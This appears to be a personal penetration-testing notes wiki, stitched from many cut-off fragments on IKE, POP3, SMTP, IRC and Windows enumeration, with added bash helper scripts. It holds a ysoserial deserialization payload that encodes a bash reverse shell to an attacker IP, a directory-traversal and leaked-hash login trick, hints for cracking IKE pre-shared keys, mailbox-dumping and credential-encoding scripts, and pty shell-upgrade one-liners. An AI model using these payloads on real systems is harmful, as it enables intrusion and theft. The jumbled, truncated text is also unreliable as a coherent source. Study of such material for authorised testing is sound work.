IKE (Internet Key Exchange, the key-negotiation protocol of IPsec VPNs) is served by VPN gateways on UDP 500. Test a server with
  ike-scan -M $target
Example output:
  SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
  Ending ike-scan 1.9.4: 1 hosts scanned in 0.039 seconds (25.32 hosts/sec). 1 returned handshake; 0 returned notify
Auth=PSK means that a pre-shared key is used. "1 returned handshake, 0 returned notify" means that…
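As an added example (not part of the original notes): a small bash parser for the SA=(...) line that ike-scan -M prints. It pulls out the transform attributes and flags the ones a pentester would put in the report (legacy cipher or hash, 768/1024-bit MODP group, PSK authentication). The sample line is the one from the output above; the thresholds for "weak" are this example's own choice.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes. Parses the SA=(...) line that
# ike-scan -M prints and reports weak transform attributes.

# Sample line copied from the ike-scan output above.
SAMPLE_SA='SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)'

# sa_attr LINE KEY -> value of KEY inside SA=(...), empty when absent.
# The greedy \(.*\) runs to the last ')' so a key like LifeDuration(4) survives.
sa_attr() {
  printf '%s\n' "$1" | sed -n 's/.*SA=(\(.*\)).*/\1/p' | tr ' ' '\n' | sed -n "s/^$2=//p"
}

# sa_findings LINE -> one finding per line; prints nothing when nothing is weak.
sa_findings() {
  enc=$(sa_attr "$1" Enc)
  hsh=$(sa_attr "$1" Hash)
  grp=$(sa_attr "$1" Group)
  auth=$(sa_attr "$1" Auth)
  case "$enc"  in DES|3DES) echo "weak cipher: $enc";; esac
  case "$hsh"  in MD5|SHA1) echo "weak hash: $hsh";; esac
  case "$grp"  in 1:*|2:*)  echo "weak DH group: $grp (768/1024-bit MODP)";; esac
  # Group 1 = modp768, group 2 = modp1024; both are far below current guidance.
  case "$auth" in PSK)      echo "PSK auth: retry in aggressive mode (ike-scan -A) and feed the captured parameters to psk-crack";; esac
}

sa_findings "$SAMPLE_SA"
```

Paste any SA line into sa_findings; a gateway that only offers the transform above gets all four findings, while a modern AES/SHA2/modp2048/certificate configuration produces no output.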
What to do if all ports seem to be closed?
- Open Wireshark and keep it capturing during a full TCP scan.
- Scan all UDP ports as well.
- Filter in Wireshark for packets in which the target connected back to you.
- Port knocking?
- Can you trigger the server via a third party? Or does its behaviour change depending on the time?
Enumeration
See the Oracle article.
If you can provide a serialized (.ser) file, create a payload directly from the source code if you have it, or just use a ysoserial payload:
  java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "ping -c 4 192.168.49.175" > /tmp/recycler.ser
  // Prepare a reverse shell command line and transform it into base64. The gadget chain ends in
  // Runtime.exec(), which splits on whitespace and runs no shell, so pipes and redirections
  // only work once they are hidden inside the base64 string and expanded by bash itself.
  java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjE3NS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}"…
File and directory integrity levels
  C:\Users\User>icacls hallo
  hallo NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        WINDEV2012EVAL\User:(I)(F)
        Mandatory Label\High Mandatory Level:(NW)
(I)(F) means that the corresponding user or group has Full (F) permission on the file and that the permission is inherited (I) from the parent directory. Note that the Read right (R) also allows execution of that file! (There…
Should the exploit /tmp/18650.py not work, use svwar -m INVITE -e100-500 10.10.10.7 to determine the proper extension ID.
Pentesters love 0days and cool exploits. "There are FAR more misconfigurations than vulns." "Vulns will be detected and patched by Nessus, Nexpose, etc." "Misconfigurations typically are missed by scanners." "You want to increase security? Go to your boss and change the job descriptions of admins to include confidentiality and integrity. That matters more than anything else." "If you…
Various
Show who else is logged in:
  qwinsta
Open the Event Viewer and search the logs. Have fun!
Network enumeration
Show the network configuration. Are there multiple interfaces?
  ipconfig /all
Routing information:
  route print
Show current network connections. After running this command, CHECK the listening ports against the ones found earlier from the outside: ports that listen locally but were not reachable in the port scan point to a firewall or to services bound to localhost, i.e. port-forwarding candidates!
  netstat -ano
Check the ARP cache…
Determine whether the system has WSL with bash:
  where /R C:\windows bash.exe
If bash.exe is there and WSL is running, commands can be run as root (!) inside the Linux environment, e.g.:
  C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.19041.423_none_1da742a41b53e164\bash.exe whoami
Install the WSL
To install WSL, a SYSTEM shell is unfortunately required. See this article for installation.
Version 8 has an interesting vulnerability. Directory traversal with multiple/remote/14641.py reveals a SHA1 password hash. On the publicly accessible login page the salt can be read and combined with the hash the same way the login form does it (HMAC-SHA1 keyed with the salt), which gives the value to submit:
  console.log(hex_hmac_sha1(document.loginform.salt.value, '2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03'));
Dumpzilla
Extracts the content of a Firefox profile directory. Download the profile directory and see what it contains:
  dumpzilla 84p8ofq6.default --Summary
Use the modules to see the details.
Enumeration
Mandatory
Enumerate with nmap:
  nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 6697 $target
Connect and get version information (6697 is conventionally the TLS port; if telnet only shows binary garbage, connect with openssl s_client instead):
  telnet $target 6697
  USER duperuser4242 0 * duperuser4242
  NICK duperuser4242
  VERSION
  INFO
  HELP
Optional
Example:
  # telnet $target 110
  Trying 10.10.10.51...
  Connected to 10.10.10.51.
  Escape character is '^]'.
  +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
  USER mindy
  +OK
  PASS root
  +OK Welcome mindy
  LIST
  +OK 2 1945
  1 1109
  2 836
  .
  RETR 1
  +OK Message follows
  ...
Enumeration
Mandatory
Grab banner:
  telnet $target 119
Enumerate with nmap:
  nmap -p 119 --script nntp-ntlm-info $target
Optional
See POP3.
Enumeration
Mandatory
Grab banner:
  telnet $target 110
  openssl s_client -connect $target:995 -crlf -quiet
In case of issues, see the openssl article.
Search for exploits.
If you have credentials, log in and read the emails.
Optional
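As an added example (not from the original notes), serving both the interactive POP3 session shown earlier (the solidstate server) and the "log in and read the emails" step here: two bash helpers that parse a LIST reply and turn it into the command batch for dumping every message through nc. The LIST reply below is constructed to match the shape of the session above; the user name and password are placeholders.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes. Scripts a POP3 mailbox dump
# once credentials are known: pop3_ids parses the reply to LIST, pop3_batch
# emits the USER/PASS/RETR n/QUIT sequence to pipe into nc or telnet.

# Constructed LIST reply, same shape as "+OK 2 1945 / 1 1109 / 2 836 / ." above.
SAMPLE_LIST='+OK 2 1945
1 1109
2 836
.'

# pop3_ids LIST_REPLY -> message numbers, one per line.
# Only "<number> <size>" lines match; the "+OK ..." status line and the
# terminating "." are skipped.
pop3_ids() {
  printf '%s\n' "$1" | sed -n '/^[0-9][0-9]* [0-9][0-9]*$/s/ .*//p'
}

# pop3_batch USER PASS LIST_REPLY -> complete command script for the server.
pop3_batch() {
  printf 'USER %s\nPASS %s\n' "$1" "$2"
  pop3_ids "$3" | while read -r id; do printf 'RETR %s\n' "$id"; done
  printf 'QUIT\n'
}

# Constructed usage: the batch for the sample mailbox.
pop3_batch mindy 'password-here' "$SAMPLE_LIST"
```

In practice, first fetch the real LIST reply with printf 'USER mindy\nPASS ...\nLIST\nQUIT\n' | nc $target 110, then pipe the output of pop3_batch into nc the same way and save everything to a file; RETR replies end with a line containing only ".", so the messages can be split on that.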
Login
Before logging in, convert the username and password into base64. (!) Use telnet; nc sometimes does not work and does not return the server's response!
  HELO myname
  AUTH LOGIN
  334 VXNlcm5hbWU6   // server responds with a base64 string ("Username:")
  cm9vdAo=           // username in base64
  334 UGFzc3dvcmQ6   // "Password:"
  cm9vdAo=           // password in base64
  235 ok             // success
Note that cm9vdAo= decodes to "root" followed by a newline (the trailing Ao= is the encoded line feed that echo adds without -n); if the server rejects the credentials, encode without the newline, which gives cm9vdA==.
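As an added example (not from the original notes): bash helpers that produce the AUTH LOGIN lines to paste into telnet and decode the server's 334 prompts. The credentials and prompt lines used below are constructed; the point is the newline pitfall visible in cm9vdAo= above.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes. Encodes SMTP AUTH LOGIN
# credentials without the stray newline and decodes the server's prompts.

# b64 STRING -> base64 of STRING with no newline in the plaintext.
# "echo root | base64" gives cm9vdAo= (Ao= is the encoded "\n"); the server
# then sees the user name "root\n", which is why such logins can silently fail.
b64() { printf '%s' "$1" | base64 | tr -d '\n'; }

# unb64 STRING -> decoded bytes.
unb64() { printf '%s' "$1" | base64 -d; }

# auth_prompt "334 <base64>" -> the decoded prompt text, e.g. "Username:".
auth_prompt() { unb64 "${1#334 }"; }

# auth_login_script USER PASS -> the four client lines, in order, ready to paste.
auth_login_script() {
  printf 'HELO myname\nAUTH LOGIN\n%s\n%s\n' "$(b64 "$1")" "$(b64 "$2")"
}

# Constructed usage.
auth_login_script root 'password-here'
printf 'server asked for: %s\n' "$(auth_prompt '334 VXNlcm5hbWU6')"
```

Paste the lines one at a time after each 334 prompt; auth_prompt tells you which credential the server is asking for, so that the username and password are not sent in the wrong order.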
See SMTP article
Show all processes in a wide console:
  ps auxww
sudo = doas (doas is the sudo equivalent, e.g. on OpenBSD)
Personal collection of some infosec stuff. The primary purpose of this site is to collect and organize material for myself.
Note: some content is not publicly visible due to copyright issues, so some links may be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';